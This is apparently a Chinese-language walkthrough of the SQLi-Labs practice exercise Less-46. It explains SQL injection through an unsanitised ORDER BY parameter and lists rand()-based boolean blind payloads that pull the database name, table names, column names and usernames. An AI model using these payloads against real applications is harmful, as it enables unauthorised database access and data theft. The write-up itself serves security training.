SQL注入 Less46(order by后的注入+rand()布尔盲注)

$id=$_GET['sort'];$sql = "SELECT * FROM users ORDER BY $id";

我们的注入点在 order by 后面的参数中，==而 order by不同于的我们在 where 后的注入点，不能使用 union 等进行注入==。

测试是否存在注入点

?sort=1 desc
?sort=1 asc

desc是 descend 降序意思
asc 是 ascend 升序意思

返回结果不同，说明可以注入。可利用 order by 后的一些参数进行注入

==关于下面的这部分与解题无关，直接看布尔盲注的部分即可==
?sort=right(version(),1)
?sort=left(version(),1)
返回结果都是


我觉得可能是字符型的数字，所以又试了一下

不知道是不是会自动进行类型转换啥的

?sort=5

?sort='5'

所以，left(version(),1)返回的应该确实是字符型的数字

布尔盲注

select * from users order by rand();
对users表随机进行排序。
rand()返回的是一个0-1的浮点数，order by 后面跟的是列名或列号。
这里其实可以理解成users表中增加了一个rand字段，字段值是随机产生的。根据该rand字段来对users表进行排序。所以就到达了随机排序的效果

更多原理，看这篇
MySQL-17：order by rand()

select * from users order by rand(1);
select * from users order by rand(0);

?sort=rand(1)

?sort=rand(0)

?sot=rand(1=1)

?sort=rand(length(database())=8)

?sort=rand(ascii(substr(database(),1,1))=115)

?sort=rand(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101)

?sort=rand(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i')

?sort=rand(ascii(substr((select username from users limit 0,1), 1,1))=68)

当然这一题可以用时间盲注和报错注入来写的，Less47会用报错注入来写

https://blog.csdn.net/Kevinhanser/article/details/81563461
https://blog.csdn.net/weixin_43901998/article/details/107577630